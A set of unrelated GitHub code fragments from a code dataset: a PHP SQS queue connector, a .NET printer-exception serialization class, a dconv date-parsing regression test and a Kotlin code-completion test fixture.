        $config = array_merge([
            'version' => 'latest',
            'http' => [
                'timeout' => 60,
                'connect_timeout' => 60,
            ],
        ], $config);

        // Only pass explicit credentials when both halves are present and
        // non-empty. The original read $config['key'] unguarded, which raises
        // an undefined-index notice when credentials are omitted — the normal
        // case when relying on the SDK's default provider chain (env vars,
        // instance profiles, etc.).
        if (! empty($config['key']) && ! empty($config['secret'])) {
            $config['credentials'] = Arr::only($config, ['key', 'secret']);
        }

        return new SqsQueue(new SqsClient($config), $config['queue']);
    }
}
| {
"pile_set_name": "Github"
} |
// Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// This file isn't built into the .csproj in the runtime libraries but is consumed by Mono.
using System.Runtime.Serialization;
namespace System.Drawing.Printing
{
partial class InvalidPrinterException
{
    // Deserialization constructor: restores the PrinterSettings that
    // GetObjectData stored under the "settings" key. (_settings is declared
    // in the other half of this partial class.)
    protected InvalidPrinterException(SerializationInfo info, StreamingContext context) : base(info, context)
    {
        _settings = (PrinterSettings)info.GetValue("settings", typeof(PrinterSettings));
    }

    // Serializes the base exception state plus the offending PrinterSettings
    // so the exception round-trips across serialization boundaries.
    public override void GetObjectData(SerializationInfo info, StreamingContext context)
    {
        base.GetObjectData(info, context);
        info.AddValue("settings", _settings);
    }
}
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/clitoris ## -*- shell-script -*-
## Regression test: dconv must reject (non-zero exit via `!`, and produce no
## output) a malformed date string with a duplicated year and a zero month.
## NOTE(review): relies on clitoris ignoring leading `##` lines, as the
## trailing footer comment below suggests — confirm with the harness.
$ ! dconv "2015-2015-00-12-12"
$
## dconv.120.clit ends here
| {
"pile_set_name": "Github"
} |
fun some(a : Statement<caret>)
// INVOCATION_COUNT: 1
// EXIST: { lookupString:"Statement", tailText:" (java.sql)" }
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.